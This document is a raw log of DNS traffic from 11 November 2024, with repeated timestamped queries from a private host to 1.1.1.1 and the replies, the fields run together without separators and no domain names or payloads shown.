                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.560183048 CET6272153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.560818911 CET53648921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.561152935 CET5418153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.563647032 CET5491153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.563760996 CET53649621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.565386057 CET6513353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.566637039 CET53619761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.567495108 CET6288353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.569845915 CET53512781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.570264101 CET5082753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.570338964 CET53627211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.572057962 CET53541811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.573404074 CET53549111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.573414087 CET53651331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.578440905 CET53628831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.580176115 CET53508271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.580462933 CET5419953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.580841064 CET6169653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.580841064 CET5948253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.584475040 CET6104553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.584475040 CET5331053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.586344004 CET53648401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.587047100 CET53647631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.587977886 CET5202553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.588399887 CET5113653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.588787079 CET5219753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.588787079 CET5176653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.594563007 CET53616961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.594575882 CET53594821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.594587088 CET53610451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.594595909 CET53533101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.598737001 CET53511361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.598807096 CET5308053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.599735975 CET5327253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.600119114 CET5535653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.600238085 CET5580253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.600238085 CET5511853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.600279093 CET53517661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.600434065 CET6223853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.600555897 CET53521971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.600759029 CET4952653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.601049900 CET6040953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.601586103 CET6428653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.604738951 CET6115753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.604931116 CET5664853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.605211973 CET5817153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.605314970 CET6538353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.605635881 CET5893253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.605635881 CET5332453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.605829954 CET6255653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.605829954 CET5288953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.606009960 CET5425353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.606009960 CET6346453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.606311083 CET6492753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.606311083 CET6438653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.606484890 CET6431553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.606484890 CET6524853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.607402086 CET53558021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.607753038 CET53551181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.609035969 CET53530801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.611563921 CET53553561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.612411976 CET53604091.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.612479925 CET5044253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.612654924 CET53541991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.612665892 CET53642861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.613373995 CET53634641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.614099979 CET53528891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.615771055 CET53653831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.615781069 CET53566481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.616183043 CET53589321.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.620994091 CET53533241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.621015072 CET53625561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.621581078 CET53520251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.631124020 CET53532721.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.631279945 CET53495261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.632184029 CET53622381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.636888981 CET53611571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.637111902 CET53581711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.644059896 CET53542531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.644077063 CET53652481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.644088030 CET53643151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.644098043 CET53649271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.644103050 CET53643861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.657875061 CET53504421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.100918055 CET6336153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.112818003 CET53633611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.323178053 CET5809053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.333103895 CET53580901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.557375908 CET5078853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.557375908 CET5885953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.563910961 CET6059653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.564131975 CET5463253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.564300060 CET5269053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.567137003 CET53507881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.569895983 CET53588591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.570097923 CET6429053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.570377111 CET6001853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.573908091 CET53605961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.574345112 CET53546321.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.575547934 CET53526901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.579687119 CET53600181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.594202042 CET5781053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.594429016 CET5606353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.594454050 CET5418153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.594691038 CET4983653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.594943047 CET5793653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.595113993 CET4983253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.595292091 CET6304553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.595525980 CET6019253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.595700979 CET6343353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.596086025 CET5710153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.596328020 CET6363853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.601156950 CET53642901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.604321957 CET53541811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.604691029 CET53579361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.605432034 CET53630451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.605443954 CET53498361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.606529951 CET53634331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.606801033 CET53601921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.607244015 CET53636381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.613164902 CET53578101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.625519991 CET53498321.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.625581026 CET53560631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.627446890 CET6222353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.630069971 CET53571011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.659543037 CET53622231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.841991901 CET5265153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.843177080 CET5308753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.844007969 CET6213553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.852099895 CET53621351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.855186939 CET5873853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.855288982 CET6112753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.866982937 CET6257653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.871445894 CET6460753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.873735905 CET53526511.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.873773098 CET53530871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.874738932 CET53587381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.877029896 CET53625761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.877566099 CET5919253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.882324934 CET53646071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.884262085 CET6462853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.886195898 CET53611271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.886809111 CET6111253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.894273996 CET5626853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.895488024 CET5159553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.901329994 CET6351953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.904342890 CET5975053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.904750109 CET53562681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.905749083 CET6239453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.907253981 CET5680553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.908730984 CET53591921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.912125111 CET53635191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.912337065 CET5566153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.914239883 CET5468253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.915860891 CET53646281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.915966034 CET53623941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.918556929 CET53611121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.919830084 CET5452853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.924700975 CET53546821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.927078962 CET53545281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.928138018 CET53515951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.936472893 CET53597501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.937375069 CET53568051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.943907022 CET53556611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.185297012 CET6524053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.192687035 CET53652401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.234761000 CET5125753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.235008001 CET6123953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.237982035 CET5621553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.245083094 CET5858053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.245116949 CET53512571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.245479107 CET53612391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.245568037 CET4976053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.255423069 CET53497601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.255621910 CET53585801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.260066986 CET5785553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.260271072 CET5562253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.260672092 CET5208753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.261075974 CET5861653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.261475086 CET6105253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.261826038 CET6359453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.262222052 CET5933853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.262967110 CET6099253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.268965960 CET53562151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.271100998 CET53635941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.272173882 CET53593381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.272905111 CET53556221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.274144888 CET53609921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.284285069 CET53520871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.291173935 CET53578551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.294476032 CET53586161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.294487000 CET53610521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.400259972 CET6170853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.400543928 CET5908553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.401227951 CET5268653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.401585102 CET5034553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.401737928 CET5339453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.411937952 CET53526861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.412195921 CET4951953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.412431955 CET5694053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.418724060 CET53617081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.422681093 CET53495191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.425457954 CET53569401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.432192087 CET53590851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.432746887 CET53503451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.433450937 CET53533941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.659071922 CET6258153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.692084074 CET53625811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.220727921 CET6475253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.226500988 CET6223353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.226670027 CET5301453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.226757050 CET6324053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.231683016 CET53647521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.236881971 CET53530141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.236979008 CET53632401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.237349033 CET53622331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.296760082 CET6026853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.296957970 CET5976453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297101021 CET5549453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297239065 CET5117653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297374964 CET5917853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297518969 CET5102553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297668934 CET6468053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297806025 CET6072153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.297996998 CET5089053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.298548937 CET6332653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.298904896 CET5279453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.299509048 CET5554653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.299675941 CET5137253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.299931049 CET4992153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.300080061 CET5265753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.300224066 CET5190353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.300385952 CET5347153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.302961111 CET5252453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.305586100 CET53508901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.306440115 CET53602681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.307009935 CET53511761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.307384014 CET53554941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.308654070 CET53607211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.308924913 CET53633261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.309056044 CET53591781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.309432030 CET53555461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.310429096 CET53527941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.310535908 CET53519031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.311682940 CET53526571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.314287901 CET53525241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.315238953 CET5844453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.315777063 CET5723853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.317702055 CET5642853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.318222046 CET5460553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.321271896 CET6552053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.321518898 CET5503353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.325062037 CET53584441.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.326966047 CET6553153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.327688932 CET53597641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.328372002 CET53646801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.328663111 CET53564281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.328879118 CET53510251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.330868959 CET53499211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.331181049 CET53513721.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.331897974 CET53550331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.332813978 CET5264853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.333733082 CET53534711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.337476015 CET53655311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.341370106 CET5997553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.343056917 CET5860153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.346266985 CET4962253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.349616051 CET53546051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.350943089 CET53526481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.351924896 CET53599751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.352794886 CET53655201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.353110075 CET53586011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.369209051 CET53496221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.394988060 CET6260653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.395199060 CET5330853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.399156094 CET5058753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.401038885 CET6111453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.401431084 CET5535253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.405426025 CET53626061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.405678034 CET53533081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.407453060 CET5072453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.409857988 CET53505871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.410773039 CET53611141.1.1.1192.168.2.6
